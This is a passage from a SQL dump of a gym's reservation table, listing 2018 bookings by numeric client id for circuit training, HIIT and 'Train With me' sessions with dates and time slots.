(13183, 230, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13182, 31, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13181, 48, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13180, 310, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13179, 247, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13178, 348, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13210, 294, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13177, 348, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13176, 173, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13175, 339, 'CTR', '2018-06-06', '18h45', '19h15', 'Circuit training'),
(13174, 177, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13173, 92, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13172, 349, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13171, 350, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13170, 231, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13169, 359, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13168, 360, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13165, 80, 'CTR', '2018-05-30', '18h00', '18h30', 'Circuit Training'),
(13164, 80, 'CTR', '2018-05-30', '18h00', '18h30', 'Circuit Training'),
(13205, 255, 'CTR', '2018-06-11', '17h30', '18h00', 'Circuit Training'),
(13197, 349, 'CTR', '2018-06-04', '17h30', '18h00', 'Circuit Training'),
(13198, 80, 'CTR', '2018-06-04', '17h30', '18h00', 'Circuit Training'),
(13199, 132, 'CTR', '2018-06-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13200, 132, 'CTR', '2018-06-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13201, 105, 'CTR', '2018-06-07', '18h45', '19h15', 'Circuit Training'),
(13157, 48, 'CTR', '2018-06-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13156, 48, 'CTR', '2018-06-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13155, 294, 'CTR', '2018-06-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13154, 294, 'CTR', '2018-06-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13153, 279, 'CTR', '2018-06-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13152, 279, 'CTR', '2018-06-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13151, 350, 'CTR', '2018-06-04', '17h30', '18h00', 'Circuit Training'),
(13150, 351, 'CTR', '2018-06-04', '17h30', '18h00', 'Circuit Training'),
(13149, 255, 'CTR', '2018-06-04', '17h30', '18h00', 'Circuit Training'),
(13148, 231, 'CTR', '2018-06-04', '17h30', '18h00', 'Circuit Training'),
(13145, 279, 'CTR', '2018-05-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13144, 279, 'CTR', '2018-05-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13139, 205, 'CTR', '2018-05-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13138, 205, 'CTR', '2018-05-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13136, 92, 'CTR', '2018-05-28', '17h30', '18h00', 'Circuit Training'),
(13135, 356, 'CTR', '2018-05-28', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13134, 356, 'CTR', '2018-05-28', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13133, 358, 'CTR', '2018-05-28', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13132, 358, 'CTR', '2018-05-28', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13131, 306, 'CTR', '2018-05-28', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13130, 306, 'CTR', '2018-05-28', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13129, 301, 'CTR', '2018-05-28', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13128, 301, 'CTR', '2018-05-28', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13146, 138, 'CTR', '2018-06-04', '17h30', '18h00', 'Circuit Training'),
(13147, 92, 'CTR', '2018-06-04', '17h30', '18h00', 'Circuit Training'),
(13142, 205, 'CTR', '2018-05-31', '18h45', '19h15', 'Circuit Training'),
(13143, 205, 'CTR', '2018-06-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13124, 265, 'CTR', '2018-05-28', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13123, 265, 'CTR', '2018-05-28', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13122, 350, 'CTR', '2018-05-28', '17h30', '18h00', 'Circuit Training'),
(13121, 231, 'CTR', '2018-05-28', '17h30', '18h00', 'Circuit Training'),
(13167, 31, 'CTR', '2018-06-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13117, 48, 'CTR', '2018-06-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13116, 132, 'CTR', '2018-05-30', '20h30', '21h00', 'Circuit training'),
(13115, 105, 'CTR', '2018-05-31', '18h45', '19h15', 'Circuit Training'),
(13114, 342, 'CTR', '2018-05-31', '18h45', '19h15', 'Circuit Training'),
(13113, 326, 'CTR', '2018-05-31', '18h45', '19h15', 'Circuit Training'),
(13111, 344, 'CTR', '2018-05-28', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13110, 344, 'CTR', '2018-05-28', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13109, 261, 'CTR', '2018-05-25', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13108, 344, 'CTR', '2018-06-01', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13107, 48, 'CTR', '2018-05-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13105, 344, 'CTR', '2018-05-30', '20h30', '21h00', 'Circuit training'),
(13104, 323, 'CTR', '2018-05-30', '20h30', '21h00', 'Circuit training'),
(13103, 357, 'CTR', '2018-05-30', '20h30', '21h00', 'Circuit training'),
(13102, 165, 'CTR', '2018-05-30', '20h30', '21h00', 'Circuit training'),
(13101, 31, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13100, 173, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13099, 348, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13098, 348, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13097, 310, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13096, 247, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13095, 230, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13112, 138, 'CTR', '2018-05-31', '18h45', '19h15', 'Circuit Training'),
(13091, 231, 'CTR', '2018-05-30', '18h00', '18h30', 'Circuit Training'),
(13090, 92, 'CTR', '2018-05-30', '18h00', '18h30', 'Circuit Training'),
(13089, 349, 'CTR', '2018-05-30', '18h00', '18h30', 'Circuit Training'),
(13086, 255, 'CTR', '2018-05-28', '17h30', '18h00', 'Circuit Training'),
(13085, 308, 'CTR', '2018-05-24', '18h45', '19h15', 'Circuit Training'),
(13093, 339, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13083, 205, 'CTR', '2018-05-23', '18h00', '18h30', 'Circuit Training'),
(13082, 314, 'CTR', '2018-05-23', '18h00', '18h30', 'Circuit Training'),
(13081, 140, 'CTR', '2018-05-23', '18h00', '18h30', 'Circuit Training'),
(13094, 48, 'CTR', '2018-05-30', '18h45', '19h15', 'Circuit training'),
(13079, 138, 'CTR', '2018-05-21', '17h30', '18h00', 'Circuit Training'),
(13074, 48, 'CTR', '2018-05-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13077, 351, 'CTR', '2018-05-21', '17h30', '18h00', 'Circuit Training'),
(13078, 92, 'CTR', '2018-05-21', '17h30', '18h00', 'Circuit Training'),
(13075, 48, 'CTR', '2018-05-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13066, 279, 'CTR', '2018-05-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13065, 279, 'CTR', '2018-05-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13064, 281, 'CTR', '2018-05-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13063, 281, 'CTR', '2018-05-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13069, 231, 'CTR', '2018-05-21', '17h30', '18h00', 'Circuit Training'),
(13070, 255, 'CTR', '2018-05-21', '17h30', '18h00', 'Circuit Training'),
(13076, 350, 'CTR', '2018-05-21', '17h30', '18h00', 'Circuit Training'),
(13060, 265, 'CTR', '2018-05-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13056, 92, 'CTR', '2018-05-23', '18h00', '18h30', 'Circuit Training'),
(13055, 138, 'CTR', '2018-05-23', '18h00', '18h30', 'Circuit Training'),
(13054, 165, 'CTR', '2018-05-23', '20h30', '21h00', 'Circuit training'),
(13053, 323, 'CTR', '2018-05-23', '20h30', '21h00', 'Circuit training'),
(13052, 48, 'CTR', '2018-05-23', '18h45', '19h15', 'Circuit training'),
(13051, 31, 'CTR', '2018-05-23', '18h45', '19h15', 'Circuit training'),
(13050, 230, 'CTR', '2018-05-23', '18h45', '19h15', 'Circuit training'),
(13049, 310, 'CTR', '2018-05-23', '18h45', '19h15', 'Circuit training'),
(13048, 247, 'CTR', '2018-05-23', '18h45', '19h15', 'Circuit training'),
(13047, 348, 'CTR', '2018-05-23', '18h45', '19h15', 'Circuit training'),
(13046, 348, 'CTR', '2018-05-23', '18h45', '19h15', 'Circuit training'),
(13045, 339, 'CTR', '2018-05-23', '18h45', '19h15', 'Circuit training'),
(13044, 177, 'CTR', '2018-05-23', '18h00', '18h30', 'Circuit Training'),
(13057, 344, 'CTR', '2018-05-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13058, 344, 'CTR', '2018-05-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13059, 265, 'CTR', '2018-05-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13041, 231, 'CTR', '2018-05-23', '18h00', '18h30', 'Circuit Training'),
(13040, 354, 'CTR', '2018-05-25', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13039, 344, 'CTR', '2018-05-25', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13106, 48, 'CTR', '2018-05-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13037, 230, 'CTR', '2018-05-25', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13036, 132, 'CTR', '2018-05-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13035, 132, 'CTR', '2018-05-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13034, 342, 'CTR', '2018-05-24', '18h45', '19h15', 'Circuit Training'),
(13033, 325, 'CTR', '2018-05-24', '18h45', '19h15', 'Circuit Training'),
(13029, 48, 'CTR', '2018-05-18', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13028, 344, 'CTR', '2018-05-23', '20h30', '21h00', 'Circuit training'),
(13027, 210, 'CTR', '2018-05-16', '18h45', '19h15', 'Circuit training'),
(13026, 177, 'CTR', '2018-05-16', '18h00', '18h30', 'Circuit Training'),
(13025, 294, 'CTR', '2018-05-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13024, 294, 'CTR', '2018-05-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13166, 344, 'CTR', '2018-06-06', '20h30', '21h00', 'Circuit training'),
(13021, 324, 'CTR', '2018-05-14', '17h30', '18h00', 'Circuit Training'),
(13020, 297, 'CTR', '2018-05-14', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13019, 297, 'CTR', '2018-05-14', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13018, 265, 'CTR', '2018-05-14', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13017, 265, 'CTR', '2018-05-14', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13016, 306, 'CTR', '2018-05-14', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13011, 281, 'CTR', '2018-05-14', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13010, 281, 'CTR', '2018-05-14', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13014, 301, 'CTR', '2018-05-14', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13008, 358, 'CTR', '2018-05-14', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13007, 358, 'CTR', '2018-05-14', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13015, 301, 'CTR', '2018-05-14', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13140, 351, 'CTR', '2018-05-28', '17h30', '18h00', 'Circuit Training'),
(13141, 294, 'CTR', '2018-05-30', '18h00', '18h30', 'Circuit Training'),
(13499, 339, 'CTR', '2018-09-19', '19h00', '20h00', 'Circuit Training'),
(13455, 350, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13456, 80, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13002, 132, 'CTR', '2018-05-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13001, 132, 'CTR', '2018-05-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)');
INSERT INTO `reservation_reservation` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(13000, 351, 'CTR', '2018-05-14', '17h30', '18h00', 'Circuit Training'),
(12999, 350, 'CTR', '2018-05-14', '17h30', '18h00', 'Circuit Training'),
(13022, 294, 'CTR', '2018-05-23', '20h30', '21h00', 'Circuit training'),
(13088, 350, 'CTR', '2018-05-30', '18h00', '18h30', 'Circuit Training'),
(12996, 92, 'CTR', '2018-05-14', '17h30', '18h00', 'Circuit Training'),
(12995, 255, 'CTR', '2018-05-14', '17h30', '18h00', 'Circuit Training'),
(12994, 231, 'CTR', '2018-05-14', '17h30', '18h00', 'Circuit Training'),
(12993, 138, 'CTR', '2018-05-14', '17h30', '18h00', 'Circuit Training'),
(12992, 48, 'CTR', '2018-05-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12991, 48, 'CTR', '2018-05-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12990, 344, 'CTR', '2018-05-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12989, 344, 'CTR', '2018-05-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13032, 326, 'CTR', '2018-05-24', '18h45', '19h15', 'Circuit Training'),
(13030, 326, 'CTR', '2018-05-17', '18h45', '19h15', 'Circuit Training'),
(12986, 325, 'CTR', '2018-05-17', '18h45', '19h15', 'Circuit Training'),
(12985, 342, 'CTR', '2018-05-17', '18h45', '19h15', 'Circuit Training'),
(12984, 322, 'CTR', '2018-05-17', '18h45', '19h15', 'Circuit Training'),
(13031, 322, 'CTR', '2018-05-24', '18h45', '19h15', 'Circuit Training'),
(12982, 353, 'CTR', '2018-05-18', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12981, 354, 'CTR', '2018-05-18', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12980, 230, 'CTR', '2018-05-18', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12979, 294, 'CTR', '2018-05-18', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12978, 344, 'CTR', '2018-05-18', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12977, 180, 'CTR', '2018-05-18', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12976, 3, 'CTR', '2018-05-18', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12975, 353, 'CTR', '2018-05-11', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12974, 354, 'CTR', '2018-05-11', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12973, 180, 'CTR', '2018-05-11', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12972, 3, 'CTR', '2018-05-11', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12971, 80, 'CTR', '2018-05-11', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12970, 80, 'CTR', '2018-05-11', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12969, 294, 'CTR', '2018-05-16', '20h30', '21h00', 'Circuit training'),
(12968, 294, 'CTR', '2018-05-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12967, 294, 'CTR', '2018-05-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12965, 90, 'CTR', '2018-05-16', '20h30', '21h00', 'Circuit training'),
(12964, 323, 'CTR', '2018-05-16', '20h30', '21h00', 'Circuit training'),
(12963, 165, 'CTR', '2018-05-16', '20h30', '21h00', 'Circuit training'),
(12962, 357, 'CTR', '2018-05-16', '20h30', '21h00', 'Circuit training'),
(12961, 357, 'CTR', '2018-05-09', '20h30', '21h00', 'Circuit training'),
(12960, 31, 'CTR', '2018-05-16', '18h45', '19h15', 'Circuit training'),
(12966, 48, 'CTR', '2018-05-16', '18h45', '19h15', 'Circuit training'),
(12958, 348, 'CTR', '2018-05-16', '18h45', '19h15', 'Circuit training'),
(12957, 348, 'CTR', '2018-05-16', '18h45', '19h15', 'Circuit training'),
(12956, 310, 'CTR', '2018-05-16', '18h45', '19h15', 'Circuit training'),
(12955, 247, 'CTR', '2018-05-16', '18h45', '19h15', 'Circuit training'),
(12954, 173, 'CTR', '2018-05-16', '18h45', '19h15', 'Circuit training'),
(12948, 344, 'CTR', '2018-05-16', '20h30', '21h00', 'Circuit training'),
(12953, 350, 'CTR', '2018-05-16', '18h00', '18h30', 'Circuit Training'),
(12947, 344, 'CTR', '2018-05-11', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12946, 80, 'CTR', '2018-05-09', '20h30', '21h00', 'Circuit training'),
(12943, 140, 'CTR', '2018-05-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12944, 324, 'CTR', '2018-05-09', '18h00', '18h30', 'Circuit Training'),
(12942, 140, 'CTR', '2018-05-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12941, 138, 'CTR', '2018-05-09', '18h00', '18h30', 'Circuit Training'),
(12939, 132, 'CTR', '2018-05-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12938, 132, 'CTR', '2018-05-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12937, 279, 'CTR', '2018-05-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12936, 279, 'CTR', '2018-05-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12935, 48, 'CTR', '2018-05-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12934, 48, 'CTR', '2018-05-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12932, 138, 'CTR', '2018-05-07', '17h30', '18h00', 'Circuit Training'),
(12930, 231, 'CTR', '2018-05-07', '17h30', '18h00', 'Circuit Training'),
(12929, 349, 'CTR', '2018-05-07', '17h30', '18h00', 'Circuit Training'),
(12928, 350, 'CTR', '2018-05-07', '17h30', '18h00', 'Circuit Training'),
(12927, 351, 'CTR', '2018-05-07', '17h30', '18h00', 'Circuit Training'),
(12926, 281, 'CTR', '2018-05-07', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12925, 281, 'CTR', '2018-05-07', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12924, 306, 'CTR', '2018-05-07', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12923, 306, 'CTR', '2018-05-07', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12922, 301, 'CTR', '2018-05-07', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12921, 301, 'CTR', '2018-05-07', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12920, 297, 'CTR', '2018-05-07', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12919, 297, 'CTR', '2018-05-07', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12918, 265, 'CTR', '2018-05-07', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12917, 265, 'CTR', '2018-05-07', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12916, 358, 'CTR', '2018-05-07', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12915, 358, 'CTR', '2018-05-07', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12914, 356, 'CTR', '2018-05-07', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12951, 138, 'CTR', '2018-05-16', '18h00', '18h30', 'Circuit Training'),
(12910, 165, 'CTR', '2018-05-09', '20h30', '21h00', 'Circuit training'),
(12911, 90, 'CTR', '2018-05-09', '20h30', '21h00', 'Circuit training'),
(12909, 323, 'CTR', '2018-05-09', '20h30', '21h00', 'Circuit training'),
(12908, 280, 'CTR', '2018-05-09', '20h30', '21h00', 'Circuit training'),
(12952, 349, 'CTR', '2018-05-16', '18h00', '18h30', 'Circuit Training'),
(12945, 340, 'CTR', '2018-05-09', '20h30', '21h00', 'Circuit training'),
(12905, 310, 'CTR', '2018-05-09', '18h45', '19h15', 'Circuit training'),
(12904, 247, 'CTR', '2018-05-09', '18h45', '19h15', 'Circuit training'),
(12903, 348, 'CTR', '2018-05-09', '18h45', '19h15', 'Circuit training'),
(12902, 348, 'CTR', '2018-05-09', '18h45', '19h15', 'Circuit training'),
(12901, 173, 'CTR', '2018-05-09', '18h45', '19h15', 'Circuit training'),
(12900, 31, 'CTR', '2018-05-09', '18h45', '19h15', 'Circuit training'),
(12899, 48, 'CTR', '2018-05-09', '18h45', '19h15', 'Circuit training'),
(12898, 92, 'CTR', '2018-05-09', '18h00', '18h30', 'Circuit Training'),
(12897, 231, 'CTR', '2018-05-09', '18h00', '18h30', 'Circuit Training'),
(12950, 231, 'CTR', '2018-05-16', '18h00', '18h30', 'Circuit Training'),
(12949, 92, 'CTR', '2018-05-16', '18h00', '18h30', 'Circuit Training'),
(12894, 255, 'CTR', '2018-05-07', '17h30', '18h00', 'Circuit Training'),
(12893, 344, 'CTR', '2018-05-07', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12892, 344, 'CTR', '2018-05-07', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12891, 132, 'CTR', '2018-05-04', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13452, 255, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(12887, 90, 'CTR', '2018-05-02', '20h30', '21h00', 'Circuit training'),
(12884, 92, 'CTR', '2018-05-02', '18h00', '18h30', 'Circuit Training'),
(12883, 92, 'CTR', '2018-05-02', '18h00', '18h30', 'Circuit Training'),
(12882, 344, 'CTR', '2018-05-09', '20h30', '21h00', 'Circuit training'),
(12875, 304, 'CTR', '2018-04-30', '17h30', '18h00', 'Circuit Training'),
(12874, 294, 'CTR', '2018-05-02', '20h30', '21h00', 'Circuit training'),
(12873, 132, 'CTR', '2018-05-02', '20h30', '21h00', 'Circuit training'),
(12872, 165, 'CTR', '2018-05-02', '20h30', '21h00', 'Circuit training'),
(12871, 323, 'CTR', '2018-05-02', '20h30', '21h00', 'Circuit training'),
(12870, 348, 'CTR', '2018-05-02', '18h45', '19h15', 'Circuit training'),
(12869, 230, 'CTR', '2018-05-02', '18h45', '19h15', 'Circuit training'),
(12868, 247, 'CTR', '2018-05-02', '18h45', '19h15', 'Circuit training'),
(12885, 340, 'CTR', '2018-05-03', '18h45', '19h15', 'Circuit Training'),
(12866, 173, 'CTR', '2018-05-02', '18h45', '19h15', 'Circuit training'),
(12865, 31, 'CTR', '2018-05-02', '18h45', '19h15', 'Circuit training'),
(12864, 48, 'CTR', '2018-05-02', '18h45', '19h15', 'Circuit training'),
(12863, 339, 'CTR', '2018-05-02', '18h45', '19h15', 'Circuit training'),
(12862, 348, 'CTR', '2018-05-04', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12861, 348, 'CTR', '2018-05-02', '18h45', '19h15', 'Circuit training'),
(12913, 356, 'CTR', '2018-05-07', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12859, 231, 'CTR', '2018-05-02', '18h00', '18h30', 'Circuit Training'),
(12886, 48, 'CTR', '2018-05-03', '18h45', '19h15', 'Circuit Training'),
(12857, 180, 'CTR', '2018-05-04', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12856, 3, 'CTR', '2018-05-04', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12853, 261, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12852, 3, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12851, 180, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12850, 230, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12849, 325, 'CTR', '2018-05-03', '18h45', '19h15', 'Circuit Training'),
(12848, 342, 'CTR', '2018-05-03', '18h45', '19h15', 'Circuit Training'),
(12847, 322, 'CTR', '2018-05-03', '18h45', '19h15', 'Circuit Training'),
(12846, 48, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12845, 344, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12844, 342, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12843, 326, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12842, 325, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12841, 31, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12854, 31, 'CTR', '2018-05-04', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12855, 230, 'CTR', '2018-05-04', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12940, 92, 'CTR', '2018-05-07', '17h30', '18h00', 'Circuit Training'),
(12880, 294, 'CTR', '2018-05-11', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12881, 344, 'CTR', '2018-05-02', '20h30', '21h00', 'Circuit training'),
(12832, 324, 'CTR', '2018-04-25', '18h00', '18h30', 'Circuit Training'),
(12831, 308, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12828, 329, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12840, 132, 'CTR', '2018-04-27', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12838, 210, 'CTR', '2018-04-26', '18h45', '19h15', 'Circuit Training'),
(12839, 294, 'CTR', '2018-05-04', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13451, 344, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(12824, 255, 'CTR', '2018-04-30', '17h30', '18h00', 'Circuit Training'),
(12823, 231, 'CTR', '2018-04-30', '17h30', '18h00', 'Circuit Training'),
(12822, 350, 'CTR', '2018-04-30', '17h30', '18h00', 'Circuit Training'),
(12876, 344, 'CTR', '2018-05-04', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(12819, 351, 'CTR', '2018-04-30', '17h30', '18h00', 'Circuit Training'),
(12818, 132, 'CTR', '2018-04-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12817, 132, 'CTR', '2018-04-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12816, 344, 'CTR', '2018-04-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12815, 344, 'CTR', '2018-04-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12814, 294, 'CTR', '2018-04-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12813, 294, 'CTR', '2018-04-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12812, 279, 'CTR', '2018-04-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12811, 279, 'CTR', '2018-04-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12810, 48, 'CTR', '2018-04-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(12809, 48, 'CTR', '2018-04-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(12808, 281, 'CTR', '2018-04-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12807, 281, 'CTR', '2018-04-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(12806, 306, 'CTR', '2018-04-30', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(12805, 306, 'CTR', '2018-04-30', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
